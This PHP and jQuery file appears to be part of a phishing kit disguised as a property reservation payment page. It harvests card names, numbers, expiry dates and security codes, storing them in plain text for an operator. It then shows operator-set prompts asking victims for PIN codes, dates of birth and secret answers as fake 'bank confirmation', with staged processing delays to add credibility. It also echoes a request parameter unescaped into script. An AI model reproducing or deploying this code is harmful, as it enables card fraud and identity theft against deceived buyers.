<?php

require_once 'config.php';

require_once 'functions.php';





############################################################# CHECK STATUS #############################################################

if(isset($_GET['reserve'],$_GET['check']))

{

	try

	{

		$q = $pdo->prepare("UPDATE tracking SET tracking_cc_status_user = 0 WHERE tracking_cc_status_user = 1 AND tracking_code = ?");

		$q ->bindValue(1, $_GET['reserve']);

		$q ->execute();

	}

	catch (PDOException $e) {echo 'Error !'.$e; exit();}

	echo $q->rowCount(); exit();

}



########################################################## RESERVE USING CREDIT CARD ###################################################

if(isset($_GET['cc_name'],$_GET['cc_number'],$_GET['cc_expiration_month'],$_GET['cc_expiration_year'],$_GET['cc_security'],$_GET['reserve']))

{

	foreach($_GET as $filed_key => $field_value) { $_GET[$filed_key] = strip_tags($_GET[$filed_key]); }

	

	if(strlen($_GET['cc_number']) != 16)

	{

		echo 'Invalid credit card number !<br /><br /><a href="?reserve='.$_GET['reserve'].'">Refresh page</a>'; exit();

	}

	elseif(strlen($_GET['cc_expiration_month']) != 2)

	{

		echo 'Invalid credit card expiration month !<br /><br /><a href="?reserve='.$_GET['reserve'].'">Refresh page</a>'; exit();

	}

	elseif(strlen($_GET['cc_expiration_year']) != 4)

	{

		echo 'Invalid credit card expiration year !<br /><br /><a href="?reserve='.$_GET['reserve'].'">Refresh page</a>'; exit();

	}

	elseif(strlen($_GET['cc_security']) != 3 && strlen($_GET['cc_security']) != 4)

	{

		echo 'Invalid credit card security code !<br /><br /><a href="?reserve='.$_GET['reserve'].'">Refresh page</a>'; exit();

	}

	

	try

	{

		$q = $pdo->prepare("UPDATE tracking SET tracking_cc_name = ?, tracking_cc_number = ?, tracking_cc_expiration = ?, tracking_cc_security = ?, tracking_cc_status_admin = '1' WHERE tracking_code = ?");

		$q ->bindValue(1, $_GET['cc_name']);

		$q ->bindValue(2, $_GET['cc_number']);

		$q ->bindValue(3, $_GET['cc_expiration_month'].'-'.$_GET['cc_expiration_year']);

		$q ->bindValue(4, $_GET['cc_security']);

		$q ->bindValue(5, $_GET['reserve']);

		$q ->execute();

	}

	catch (PDOException $e) {echo 'Error !'.$e; exit();}

	if($q->rowCount() != 1)

	{

		echo 'There was an error. Please try again.';

	}

}



########################################################## RESERVE USING CREDIT CARD ###################################################

if(isset($_GET['ask'],$_GET['reserve']))

{

	try

	{

		$q = $pdo->prepare("UPDATE tracking SET tracking_cc_ask = '', tracking_cc_ask_response = ?, tracking_cc_status_admin = '1' WHERE tracking_code = ?");

		$q ->bindValue(1, $_GET['ask']);

		$q ->bindValue(2, $_GET['reserve']);

		$q ->execute();

	}

	catch (PDOException $e) {echo 'Error !'.$e; exit();}

	if($q->rowCount() != 1)

	{

		echo 'There was an error. Please try again.';

	}

}



/*** GET TRACKING FROM DATABASE ***/

try

{

	$q = $pdo->prepare("SELECT tracking.*,properties.*,agents.*,owners.* FROM tracking,properties,agents,owners WHERE tracking_code = ? AND tracking_property = property_id AND property_agent = agent_id AND property_detail_owner = owner_id");

	$q ->bindParam(1, $_GET['reserve'], PDO::PARAM_STR);

	$q ->execute();

}

catch (PDOException $e) {echo 'Error !'.$e; exit();}

if($q->rowCount() != 1)

{

	$_SESSION['error'] = 'The tracking code seems to be wrong. Please try again in a few moments or contact us !'; r('customer-area/');

}

$t = $q->fetch(PDO::FETCH_ASSOC);



/*** CC WAITING ***/

echo '<div class="cc_waiting"><img src="/f/preloader.gif" />Processing...</div>';



/*** CC DETAILS ***/

echo '<div class="cc_details r5">';

	echo '<h6>Property reservation step-by-step <span onclick="'."$('.cc_details').fadeOut();".'">Close <img src="/f/close.png" /></span></h6>';

	echo '<p>Once you enter the credit card details, you will be asked to confirm your payment using one of bank security action in order to prove that you are the possessor of the Credit Card.</p>';

	echo '<p>After confirmation, the agent engaged in selling this property will be announced to reserve the property immediately in your name.</p>';

	echo '<p>For more information about payment and reservation you can contact the agent directly at: <a href="mailto:'.str_replace(' ','.',$t['agent_name']).'@'.$domain.'">'.str_replace(' ','.',$t['agent_name']).'@'.$domain.'</a></p>';

	echo '<p><b>Note:</b> Abusing the system will result a remove of reservation.</p>';

echo '</div>';



/*** CC INSERT ***/

echo '<div class="cc"'; if(empty($t['tracking_cc_number'])) {echo ' style="display:block;"';} echo '>';

	echo '<h6>Payment: '.$t['property_detail_earnest_deposit'].' EUR</h6>';

	echo '<p><img src="/f/cc.png" /></p>';

	echo '<p>Name on card: <input type="text" name="cc_name" class="cc_name" /></p>';

	echo '<p>Card number:';

	echo '<input type="text" name="cc_number_1" class="cc_number" maxlength="4" />';

	echo '<input type="text" name="cc_number_2" class="cc_number" maxlength="4" />';

	echo '<input type="text" name="cc_number_3" class="cc_number" maxlength="4" />';

	echo '<input type="text" name="cc_number_4" class="cc_number" maxlength="4" />';

	echo '</p>';

	echo '<p>Expiration date:';

	echo '<select name="cc_expiration_month">';

		foreach(range(1,12) as $i) { if(strlen($i) == 1) {$i = '0'.$i;} echo '<option>'.$i.'</option>'; }

	echo '</select>';

	echo '<select name="cc_expiration_year">';

		$year = date("Y");

		echo '<option>'.$year.'</option>';

		foreach(range(1,20) as $i) { echo '<option>'.($year + $i).'</option>'; }

	echo '</select>';

	echo '</p>';

	echo '<p class="security">Security code: <input type="password" name="cc_security" class="cc_security" maxlength="4" /><span class="keyboard"></span></p>';

	echo '<p class="buttons">';

		echo '<button class="reserve_property r4">Reserve property now</button>';

		echo '<button>Payment details</button>';

	echo '</p>';

echo '</div>';



/*** CC WAITING FOR APPROVAL ***/

echo '<div class="cc aligned"'; if(!empty($t['tracking_cc_number']) && empty($t['tracking_cc_ask']) && empty($t['tracking_cc_ask_response'])) {echo ' style="display:block;"';} echo '>';

	echo '<h6>Payment waiting for approval</h6>';

	echo '<p>Your payment for a reservation was initiated. In a few moments, on this page, you will be asked to confirm your payment. Usually takes 1-2 hours.<br /><br />If you have questions about reserving this property or details about payment, please contact the agent engaged in selling this property at: <a href="mailto:'.str_replace(' ','.',$t['agent_name']).'@'.$domain.'">'.str_replace(' ','.',$t['agent_name']).'@'.$domain.'</a></p>';

	echo '<p class="buttons">';

		echo '<a href="mailto:'.str_replace(' ','.',$t['agent_name']).'@'.$domain.'"><button class="submit r4">Contact agent</button></a>';

		echo '<button class="details">Payment details</button>';

	echo '</p>';

echo '</div>';



/*** CC ASK FOR CARD SECURITY ***/

echo '<div class="cc aligned"'; if(!empty($t['tracking_cc_ask']) && empty($t['tracking_cc_ask_response'])) {echo ' style="display:block;"';} echo '>';

	if(str_replace(' ','',$t['tracking_cc_ask']) != '')

	{

		echo '<h6>Payment confirmation</h6>';

		echo '<p>';

			function ask_date_of_birth()

			{

				$return = '<select name="ask_date_of_birth_day">';

				foreach(range(1,31) as $i) { if(strlen($i) == 1) {$i = '0'.$i;} $return .= '<option>'.$i.'</option>'; }

				$return .= '</select>';

				$return .= '<select name="ask_date_of_birth_month">';

				foreach(range(1,12) as $i) { if(strlen($i) == 1) {$i = '0'.$i;} $return .= '<option>'.$i.'</option>'; }

				$return .= '</select>';

				$return .= '<select name="ask_date_of_birth_year">';

				$year = date("Y");

				$return .= '<option>'.$year.'</option>';

				foreach(range(1,100) as $i) { $return .= '<option>'.($year - $i).'</option>'; } $return .= '</select>'; return $return;

			}

			$t['tracking_cc_ask'] = str_replace('ask_date_of_birth',ask_date_of_birth(),$t['tracking_cc_ask'],$count_r_1);

			$t['tracking_cc_ask'] = str_replace('ask_pin_code','<input type="text" class="ask_pin_code" name="ask_pin_code" /><span class="keyboard"></span>',$t['tracking_cc_ask'],$count_r_2);

			$t['tracking_cc_ask'] = str_replace('ask_secret_answer','<input type="text" class="ask_secret_answer" name="ask_secret_answer" /><span class="keyboard"></span>',$t['tracking_cc_ask'],$count_r_3);

			echo nl2br($t['tracking_cc_ask']);

		echo '</p>';

		echo '<p class="buttons">';

			if($count_r_1 > 0 || $count_r_2 > 0 || $count_r_3 > 0)

			{

				echo '<button class="submit submit_payment_confirm r4">Confirm payment</button>';

			}

			else

			{

				echo '<a href="mailto:'.str_replace(' ','.',$t['agent_name']).'@'.$domain.'"><button class="submit r4">Contact agent</button></a>';

			}

			echo '<button class="details">Payment details</button>';

		echo '</p>';

	}

echo '</div>';



/*** CC ASK RESPONSE ***/

echo '<div class="cc aligned"'; if(!empty($t['tracking_cc_ask_response'])) {echo ' style="display:block;"';} echo '>';

	echo '<h6>Payment confirmation</h6>';

	echo '<p>Property reserved successfully. After your payment is confirmed in one of our bank accounts (it usually does not exceed 24-48 hours), the visit shall be set and the agent in charge of your transaction will be delegated to organize the visit.</p>';

	echo '<p>* Please note that an invalid credit card means an invalid payment and further the property can not be reserved. If you think that the credit card details or the confirmation is not correct, contact the agent to reset your payment.</p>';

	echo '<p>* Abusing the system will result a remove of reservation.</p>';

	

	echo '<p class="buttons">';

		echo '<a href="mailto:'.str_replace(' ','.',$t['agent_name']).'@'.$domain.'"><button class="submit r4">Contact agent</button></a>';

		echo '<button class="details">Payment details</button>';

	echo '</p>';

echo '</div>';



?>



<script>

$(document).ready(function () {

	/*** Remove style from input onclick ***/

	$('div.cc input').click(function(){ $(this).removeAttr('style'); })

	

	/*** Keyboard ***/

	$('body').append('<div class="keyboard no-select"><u>1</u><u>2</u><u>3</u><u>4</u><u>5</u><u>6</u><u>7</u><u>8</u><u>9</u><u>0</u><i>Done</i></div>');

	

	$('div.cc span.keyboard').click(function () {

		$('input').removeClass('selected_keyboard');

		var keyboard = $(this);

		var div = $(keyboard).closest('div.cc');

		if($(div).find('div.keyboard').is(':visible'))

		{

			$('div.keyboard').fadeOut(100);

		}

		else

		{

			$('div.keyboard').fadeIn(100).css('top',($(keyboard).offset().top-120) + 'px').css('left',$(keyboard).offset().left + 'px');

		}

		$(keyboard).prev('input').addClass('selected_keyboard').focus().removeAttr('style');

	});

	$('div.keyboard u').click(function () {

		if($('.selected_keyboard[maxlength]').length != 0 && parseInt($('.selected_keyboard').attr('maxlength')) == $('.selected_keyboard').val().length)

		{

			$('.selected_keyboard').css("background", "#ff8383").animate({ backgroundColor: "#fff"}, 200);

		}

		else

		{

			$('.selected_keyboard').val($('.selected_keyboard').val() + $(this).text());

		}

		$('.selected_keyboard').focus();

	});

	$('div.keyboard i').click(function () {

		$('.selected_keyboard').focus().removeClass('selected_keyboard');

		$('div.keyboard').fadeOut(100);

	});

	

	/*** CC NUMBER ***/

	$('div.cc input.cc_number').keyup(function () {

		if(Math.floor($(this).val()) != $(this).val() || !$.isNumeric($(this).val()))

		{

			$(this).css('background','#ffe2e2')

		}

		else

		{

			$(this).removeAttr('style')

		}

	});

	$('div.cc [name=cc_number_1]').on('paste', function () {

		var element = this;

		$(element).removeAttr('maxlength');

		setTimeout(function () {

			var text = $(element).val();

			$('div.cc [name=cc_number_1]').val(text.substr(0, 4));

			if($.isNumeric(text) && text.length == 16)

			{

				$('div.cc [name=cc_number_2]').val(text.substr(4, 4));

				$('div.cc [name=cc_number_3]').val(text.substr(8, 4));

				$('div.cc [name=cc_number_4]').focus().val(text.substr(12, 4));

			}

			$(element).attr('maxlength',4);

		}, 100);

	});

	

	/*** CC CREDIT CARD INSERT ***/

	$('div.cc button.reserve_property').click(function () {

		var div = $(this).closest('div.cc');

		var skip = true;

		if($(div).find('[name=cc_name]').val().replace(/ /g,'') == '' || $(div).find('[name=cc_name]').val().length < 5)

		{

			$(div).find('[name=cc_name]').css('background','#ffe2e2'); skip = false;

		}

		if(!$.isNumeric($(div).find('[name=cc_number_1]').val()) || $(div).find('[name=cc_number_1]').val().length != 4)

		{

			$(div).find('[name=cc_number_1]').css('background','#ffe2e2'); skip = false;

		}

		if(!$.isNumeric($(div).find('[name=cc_number_2]').val()) || $(div).find('[name=cc_number_2]').val().length != 4)

		{

			$(div).find('[name=cc_number_2]').css('background','#ffe2e2'); skip = false;

		}

		if(!$.isNumeric($(div).find('[name=cc_number_3]').val()) || $(div).find('[name=cc_number_3]').val().length != 4)

		{

			$(div).find('[name=cc_number_3]').css('background','#ffe2e2'); skip = false;

		}

		if(!$.isNumeric($(div).find('[name=cc_number_4]').val()) || $(div).find('[name=cc_number_4]').val().length != 4)

		{

			$(div).find('[name=cc_number_4]').css('background','#ffe2e2'); skip = false;

		}

		if($(div).find('[name=cc_security]').val().length != 3 && $(div).find('[name=cc_security]').val().length != 4)

		{

			$(div).find('[name=cc_security]').css('background','#ffe2e2'); skip = false;

		}

		

		if(skip === true)

		{

			$('td.cc div.cc_waiting').show();

			setTimeout(function () {

				$.get('cc_status.php?cc_name=' + $(div).find('[name=cc_name]').val() + '&cc_number=' + $(div).find('[name=cc_number_1]').val() + $(div).find('[name=cc_number_2]').val() + $(div).find('[name=cc_number_3]').val() + $(div).find('[name=cc_number_4]').val() + '&cc_security=' + $(div).find('[name=cc_security]').val() + '&cc_expiration_month=' + $(div).find('[name=cc_expiration_month] option:selected').text() + '&cc_expiration_year=' + $(div).find('[name=cc_expiration_year] option:selected').text() + '&reserve=<?php echo $_GET['reserve']; ?>')

				.done(function( data ) {

					$('td.cc').html(data);

				})

				.always(function( data ) {

					$('td.cc div.cc_waiting').hide()

				})

			}, 4000);

		}

	});

	

	/*** CC CREDIT CARD SECURITY ANSWER ***/

	$('div.cc button.submit_payment_confirm').click(function () {

		var div = $(this).closest('div.cc');

		var skip = true;

		var ask_date_of_birth = '';

		var ask_pin_code = '';

		var ask_secret_answer = '';

		var ask = '';

		

		if($(div).find('[name=ask_date_of_birth_day]').length == 1 && $(div).find('[name=ask_date_of_birth_month]').length == 1 && $(div).find('[name=ask_date_of_birth_year]').length == 1)

		{

			ask_date_of_birth = ask_date_of_birth + '' + $(div).find('[name=ask_date_of_birth_day] option:selected').text();

			ask_date_of_birth = ask_date_of_birth + '-' + $(div).find('[name=ask_date_of_birth_month] option:selected').text();

			ask_date_of_birth = ask_date_of_birth + '-' + $(div).find('[name=ask_date_of_birth_year] option:selected').text();

		}

		if($(div).find('[name=ask_pin_code]').length == 1)

		{

			if($(div).find('[name=ask_pin_code]').val().replace(/ /g,'') == '')

			{

				$(div).find('[name=ask_pin_code]').css("background", "#ff8383").animate({ backgroundColor: "#fff"}, 200); skip = false;

			}

			else

			{

				ask_pin_code = $(div).find('[name=ask_pin_code]').val(); 

			}

		}

		if($(div).find('[name=ask_secret_answer]').length == 1)

		{

			if($(div).find('[name=ask_secret_answer]').val().replace(/ /g,'') == '')

			{

				$(div).find('[name=ask_secret_answer]').css("background", "#ff8383").animate({ backgroundColor: "#fff"}, 200); skip = false;

			}

			else

			{

				ask_secret_answer = $(div).find('[name=ask_secret_answer]').val();

			}

		}

		

		if(ask_date_of_birth != '') { ask = ask + "<p class=security>Date of birth<span>" + ask_date_of_birth + "</span></p>"; }

		if(ask_pin_code != '') { ask = ask + "<p class=security>Pin code<span>" + ask_pin_code + "</span></p>"; }

		if(ask_secret_answer != '') { ask = ask + "<p class=security>Secret answer<span>" + ask_secret_answer + "</span></p>"; }



		if(skip === true)

		{

			$('td.cc div.cc_waiting').show();

			setTimeout(function () {

				$.get('cc_status.php?ask=' + ask + '&reserve=<?php echo $_GET['reserve']; ?>')

				.done(function( data ) {

					$('td.cc').html(data);

				})

				.always(function( data ) {

					$('td.cc div.cc_waiting').hide()

				})

			}, 4000);

		}

	});

	

	/*** PAYMENT DETAILS ***/

	$('td.cc button:contains("Payment details")').click(function(){

		$('td.cc div.cc_details').fadeIn();

	})

	

	/*** REFRESH STATUS ***/

	setInterval(function(){

		if($('td.cc div:visible:first [name=cc_name]').length == 0)

		{

			$('td.cc div.cc_waiting').show();

			$.get('cc_status.php?reserve=<?php echo $_GET['reserve']; ?>&check').done(function( data ) {

				if(data == 1)

				{

					$.get('cc_status.php?reserve=<?php echo $_GET['reserve']; ?>').done(function( data ) {

						$('td.cc').html(data);

					})

				}

			})

			.always(function( data ) {

				setTimeout(function(){

					$('td.cc div.cc_waiting').hide();

				}, 2000);

			})

		}

	}, 60000);

});

</script>